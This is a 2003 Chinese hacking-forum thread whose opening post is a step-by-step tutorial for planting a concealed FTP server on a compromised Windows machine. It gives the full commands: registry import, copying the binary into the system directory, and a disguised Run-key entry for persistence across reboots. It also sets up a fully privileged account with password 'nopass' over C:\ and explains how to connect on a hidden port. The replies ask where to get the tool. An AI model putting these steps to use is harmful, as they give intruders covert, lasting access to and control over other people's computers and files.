论坛: 黑客进阶 标题: FTP鸡肉制作 复制本贴地址    
作者: newmyth21 [newmyth21]    论坛用户   登录
我们在入侵别人机器时候,经常需要一个ftp服务器。去申请的主页空间附带的ftp服务器常常有各种限制,而且,不小心就会暴露了自己的身份。因此,建立一个自己专用的ftp服务器,是很有用的。经过我一阵疯狂搜索,终于找到了slimftp这个好东东,首先,它身材小巧,而且不需要安装,在console下就可以运行,绝对不会弹出窗口,提供了标准的上传、下载功能,而且可以更改服务端口、设置用户权限等。关于slimftp的功能,请参考它的说明文档。

在这里,我假定大家已经获得了一个管理员或者系统权限的shell,这是安装它必需的权限。

安装步骤:安装步骤分为本地设置和服务器设置。

本地设置:将本文附带的文件全部放在一个文件夹里面,这里是d:\ftp,然后运行adminftp.exe。运行窗口分成三部分,最上面是服务器的参数的设置,左下方是用户帐号的设置,右下方是访问目录的设置。

对于服务器参数的设置,只需要对server port(服务器端口)进行一下设置就可以了,因为服务器上通常还运行有ftp服务器,所以,我们改一个不一样的端口,这里我是设置了3323,另外两个参数就不用管了。然后,我们再添加一个用户,点一下new,输入一个用户名root,再选中这个用户,输入一个密码nopass 。最后,在localroot上输入一个路径c:\,这是作为root用户的根目录的,点一下new,在弹出的窗口上输入 / 就可以了,再将下面的四个权限全部钩上吧。read权限允许用户下载文件,write权限允许用户上传文件,list权限允许用户看目录列表,admin权限允许用户重命令和删除ftp服务器上的文件。如果需要,还可以创建多个用户,这就要看你了。

进入命令行,切换目录到d:\ftp,输入

reg export "HKLM\SOFTWARE\WhitSoft Development" ftp.reg

现在本地操作已经全部完成了。

远程操作:将ftp.reg、slimftp2.exe、reg.exe都上传到肉鸡上,然后将slimftp2.exe拷贝到肉鸡的系统目录(通常为c:\winnt\****32,假如不存在)上。再运行

reg import ftp.reg

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d slimftp2.exe

copy slimftp2.exe %****root%\****32

slimftp2.exe

运行copy slimftp2.exe %****root%\****32这步的时候有时会提示出错,这是因为slimftp2.exe已经是在系统目录上了。最后,删除ftp.reg吧!。

呵呵,一切都完成了,即使肉鸡重启我们的ftp服务器也会照样运行的。

不过,这个服务器的端口有点特别,我们怎么访问呢?

假如是用ie,这样输入就好了 ftp://root:nopass@192.168.0.1:3323/ 将192.168.0.1替换成你服务器的ip就可以了。dos下的ftp呢?这样!

ftp

open 192.168.0.1 3323

root

nopass

 

注意事项:你可以将slimftp2.exe的文件名、服务端口更改,但是,相应的步骤输入也应该更改。

比如,我将slimftp2.exe改名叫wsockup.exe,那么,

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d slimftp2.exe

就应该变为

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d wsockup.exe



地主 发表时间: 03-12-31 15:55

回复: newmyth21 [newmyth21]   论坛用户   登录
怎么没人吗?

B1层 发表时间: 03-12-31 17:04

回复: afan271314 [afan271314]   论坛用户   登录
这东西 哪里能下啊  我找半天了

B2层 发表时间: 03-12-31 17:26

回复: zybzc [zybzc]   论坛用户   登录
好是好 和用木马(灰鸽子)给它开FTP有什么区别呢?

B3层 发表时间: 03-12-31 18:55

回复: Idof [idof]   论坛用户   登录



B4层 发表时间: 03-12-31 18:59

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号